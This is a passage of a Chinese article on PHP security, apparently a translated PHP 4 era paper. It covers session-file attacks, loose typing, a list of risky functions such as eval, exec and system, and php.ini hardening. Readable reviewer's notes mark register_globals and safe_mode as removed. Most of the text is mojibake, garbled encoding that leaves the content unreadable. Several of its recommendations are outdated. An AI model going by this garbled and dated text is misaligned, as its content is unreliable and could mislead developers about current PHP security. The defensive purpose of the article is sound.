ÁiÍa£¬¹¥»÷Õß¿ÉÒÔÈÎÒaÖ¸¶¨¡°session id¡±£¨ÀýÈç¡°hello¡±£(C)£¬È»ºoÓÃÕa¸o¡°session id¡±´´½¨Ò»¸osessionÎļþ£¨ÀýÈç¡°/tmp/sess_hello¡±£(C)£¬µ«ÊÇ¡°session id¡±Ö»ÄÜÊÇ×ÖĸºÍÊý×Ö×eºÏ¡£
[数据类型]
PHP¾ßÓбȽÏËÉÉ¢µÄÊý¾ÝÀaÐÍ£¬±aÁ¿µÄÀaÐÍÒÀÀµÓÚËuÃÇËu´¦µÄÉÏÏÂÎÄ»¾³¡£ÀýÈ磺¡°$hello¡±¿ªÊ¼ÊÇ×Öu´®±aÁ¿£¬ÖµÎª¡°¡±£¬µ«ÊÇÔÚÇoֵʱ£¬¾Í±a³ÉÁËÕuÐαaÁ¿¡°0¡±£¬ÕaÓÐʱ¿ÉÄÜ»aµ¼ÖÂÒ»Ð(C)ÒaÏe²»µ½µÄ½a¹u¡£Èç¹u¡°$hello¡±µÄֵΪ¡°000¡±»¹ÊÇΪ¡°0¡±ÊDz»Í¬µÄ£¬empty()*µ»ØµÄ½a¹uÒ²²»»aΪÕae¡£
PHPÖеÄÊý×eÊǹØÁªÊý×e£¬Ò²¾ÍÊÇ˵£¬Êý×eµÄË÷ÒýÊÇ×Ö*u´®Ð͵ġ£ÕaÒaζ×Å¡°$hello["000"]¡±ºÍ¡°$hello[0]¡±Ò²ÊDz»Í¬µÄ¡£
¿ª¢³ÌÐoµÄʱºoÓ¦¸Ã×ÐϸµØ¿¼ÂÇÉÏÃaeµÄÎÊÌa£¬ÀýÈ磬ÎÒÃDz»Ó¦¸ÃÔÚÒ»¸oµØ½²aÊÔij¸o±aÁ¿ÊÇñΪ¡°0¡±£¬¶øÔÚÁiÍaµÄµØ½Ê¹ÓÃempty()À´ÑeÖ¤¡£
[容易出错的函数]
ÎÒÃÇÔÚÖÎoPHP³ÌÐoÖеÄÂ(C)¶´Ê±£¬Èç¹uÄܹ»Äõ½Ô´´uÂeµÄ»°£¬ÄÇôһÝÈÝÒ׳o´iµÄº¯ÊýÁбiÔoÊÇÎÒÃÇdz£ÐeÒªµÄ¡£Èç¹uÎÒÃÇÄܹ»Ô¶³Ì¸Ä±aÕaÐ(C)º¯ÊýµÄ²ÎÊýµÄ»°£¬ÄÇôÎÒÃǾͺܿÉÄÜ¢ÏÖÆaÖеÄÂ(C)¶´¡£ÏÂÃaeÊÇÒ»*ݱȽÏÏeϸµÄÈÝÒ׳o´iµÄº¯ÊýÁбi£º
<PHP´uÂeÖ´ÐÐ>
require()£º¶ÁÈ¡Ö¸¶¨ÎļþµÄÄÚÈݲ¢ÇÒ×÷ΪPHP´uÂe½aÊÍ
include()£ºÍ¬ÉÏ
eval()£º°Ñ¸ø¶¨µÄ×Öu´®×÷ΪPHP´uÂeÖ´ÐÐ
preg_replace()£ºµ±Óe¡°/e¡±¿ª¹ØÒ»ÆðʹÓÃʱ£¬Ìae»»×Öu´®½«±»½aÊÍΪPHP´uÂe
<ÃuÁiÖ´ÐÐ>
exec()£ºÖ´ÐÐÖ¸¶¨µÄÃuÁi£¬µ»ØÖ´Ðнa¹uµÄ×iºoÒ»ÐÐ
passthru()£ºÖ´ÐÐÖ¸¶¨ÃuÁi£¬µ»ØËuÓнa¹uµ½¿Í»§a¯ÀÀÆ÷
``£ºÖ´ÐÐÖ¸¶¨ÃuÁi£¬µ»ØËuÓнa¹uµ½Ò»¸oÊý×e
system()£ºÍ¬passthru()£¬µ«ÊDz»´¦Ài¶þ½øÖÆÊý¾Ý
popen()£ºÖ´ÐÐÖ¸¶¨µÄÃuÁi£¬°ÑÊaÈe»oÊa³oÁ¬½Óµ½PHPÎļþÃeÊou
<Îļþй¶>
fopen()£º´o¿ªÎļþ£¬²¢¶ÔÓ¦Ò»¸oPHPÎļþÃeÊo*u
readfile()£º¶ÁÈ¡ÎļþµÄÄÚÈÝ£¬È»ºoÊa³oµ½¿Í»§a¯ÀÀÆ÷
file()£º°ÑÕu¸oÎļþÄÚÈݶÁµ½Ò»¸oÊý×eÖÐ
ÒeÕß×¢£ºÆaʵÕaÝÁбi»¹²»ÊǺÜÈ«£¬±ÈÈç¡°mail()¡±µÈÃuÁiÒ²¿ÉÄÜÖ´ÐÐÃuÁi£¬ËuÒÔÐeÒª×Ô¼º²¹³aһϡ£
[如何增强PHP的安全性]
ÎÒÔÚÉÏÃae½eÉܵÄËuÓй¥»÷¶ÔÓÚȱʡ°²×°µÄPHP 4¶¼¿ÉÒԺܺõÄʵÏÖ£¬µ«ÊÇÎÒÒѾÖظ´Á˺ܶa´Î£¬PHPµÄÅaÖÃdz£Áe»i£¬Í¨¹ýÅaÖÃÒ»Ð(C)PHPÑ¡Ïi£¬ÎÒÃÇÍeÈ«¿ÉÄֿܵ¹ÆaÖеÄÒ»Ð(C)¹¥»÷¡£ÏÂÃaeÎÒ°´ÕÕʵÏÖµÄÄѶȶÔÒ»Ð(C)ÅaÖýøÐÐÁË*ÖÀa£º
µÍÄѶÈ
ÖеÍÄѶÈ
ÖиßÄѶÈ
****¸ßÄѶÈ
ÉÏÃaeµÄÖÀaÖ»ÊǸoÈ˵Ŀ´¨£¬µ«ÊÇÎÒ¿ÉÒÔ±£Ö¤£¬Èç¹uÄaʹÓÃÁËPHPÌa¹(C)µÄËuÓÐÑ¡ÏiµÄ»°£¬ÄÇôÄaµÄPHP½«ÊǺܰ²È«µÄ£¬¼´Ê¹ÊǵÚÈý*½µÄ´uÂeÒ²ÊÇÈç´Ë£¬ÒoΪÆaÖкܶa¹¦ÄÜÒѾ²»ÄÜʹÓá£
**** ÉeÖá°register_globals¡±Îª¡°off¡±
这个选项会禁止PHP为用户输入创建全局变量，也就是说，如果用户提交表单变量"hello"，PHP不会创建"$hello"，而只会创建"HTTP_GET/POST_VARS['hello']"。这是PHP中一个极其重要的选项，关闭这个选项，会给编程带来很大的不便。（审校注：register_globals 自 PHP 5.4 起已被移除；现代代码应始终通过 $_GET、$_POST、$_COOKIE 显式读取输入，而不是依赖自动创建的全局变量。）
** 设置"safe_mode"为"on"（审校注：safe_mode 自 PHP 5.3 起废弃、5.4 起移除，不能再作为安全边界依赖；应改用操作系统层面的用户/权限隔离）
´o¿ªÕa¸oÑ¡Ïi£¬»aÔo¼ÓÈçÏÂÏÞÖÆ£º
1£® ÏÞÖÆÄĸoÃuÁi¿ÉÒÔ±»Ö´ÐÐ
2£® ÏÞÖÆÄĸoº¯Êý¿ÉÒÔ±»Ê¹ÓÃ
3£® »uÓڽű¾ËuÓÐȨºÍÄ¿±eÎļþËuÓÐȨµÄÎļþÃÎÊÏÞÖÆ
4£® ½uÖ¹ÎļþÉÏÔع¦ÄÜ
Õa¶ÔÓÚISPÀ´ËµÊÇÒ»¸oΰ´oµÄÑ¡Ïi£¬Í¬Ê±ËuÒ²Äܼ«´oµØ¸Ä½øPHPµÄ°²È«ÐÔ¡£
** ÉeÖá°open_basedir¡±
这个选项可以禁止指定目录之外的文件操作，有效地消除了本地文件被include()的攻击，但是仍需要注意文件上载和session文件的攻击。（审校注：open_basedir 只限制文件系统路径，对"http://"之类远程URL的include()并不起作用；远程文件包含应通过把 allow_url_fopen / allow_url_include 设为 Off 来阻止。）
** ÉeÖá°display_errors¡±Îª¡°off¡±£¬ÉeÖá°log_errors¡±Îª¡°on¡±
Õa¸oÑ¡Ïi½uÖ¹°Ñ´iÎoÐÅÏ¢ÏÔʾÔÚÍøÒ³ÖУ¬¶øÊǼǼµ½ÈÕÖ¾ÎļþÖУ¬Õa¿ÉÒÔÓÐЧµÄµÖÖƹ¥»÷Õ߶ÔÄ¿±e½Å±¾Öк¯ÊýµÄ̽²a¡£